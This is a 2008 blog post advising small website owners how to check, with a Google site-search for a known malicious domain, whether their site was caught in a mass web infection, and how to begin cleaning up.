« Note to Friends: MS Office Attachments Can Be Deadly | Main | Are ISPs Accountable for Bots on Their Systems? »

March 14, 2008

[Updated: 15March2008 0932PDT]
Over the last couple of days, the malware industry (and thus its blogs, news releases, and such) have been waving their collective arms in the air about a significant number of web site infections—infections that cause unprotected and unpatched PCs stopping by to be loaded with all kinds of nasty crap. According to multiple sources, the infections count more than 10,000, spread primarily among otherwise trusted web sites.

Although this revelation is pretty shocking—because a visit to a regular, trusted site could lead to a bad moon rising—there was scant advice to the typical, non-technical web site manager to find out if the crackers have infected his or her site. Most of what advice I did see appeared to be aimed at IT guys who closely monitor their web server activities as full-time jobs. Some of the affected sites, however, are mom-and-pop type web sites. And Mom doesn't know how to "run security scans to detect deficiencies in code" (advice from McAfee Avert Labs).

So, if you run a mom-and-pop web site, here is one way to begin your investigation, using (almost) everyone's old friend, Google.

Use the Google search facility to target your web site by name and for a string of characters that signal this particular infection. For example, to check this site (spamwars.com), enter the following search into the Google text box:

"2117966.net" site:spamwars.com

Observe the quotes around the evil dot-net domain name. Substitute your own domain name after site:. If you get the message that your search did not match any documents, you're probably in good shape (against this particular attack, that is). If, on the other hand, links to your site's pages come up, you've got some cleanup to do. Be sure to advise your web hosting service immediately. Even after you clean up, the Google cache will still probably contain pointers to your old, infected pages. You want to make sure that the active links to the current pages lead to cleanly-served pages. Additionally, if your server caches search results (only your web service administrator) knows for sure), you need to get those caches cleared.

The experts are still trying to uncover exactly how these corruptions are being accomplished (a PHP forum program is a current suspect, but ASP servers are also being affected by a different attack). How ever it's being done, don't feel like your site was specifically targeted. An infection of this magnitude was certainly an automated affair. Your site's underlying server software just happened to offer the open hole through which the crackers entered. Until that hole gets identified and plugged, your site will probably continually be vulnerable (sigh).

It's bad enough that the crooks have destroyed email as a communications medium. Now they're going to impose fear in the everyday activity of surfing our favorite web sites. This could get very ugly.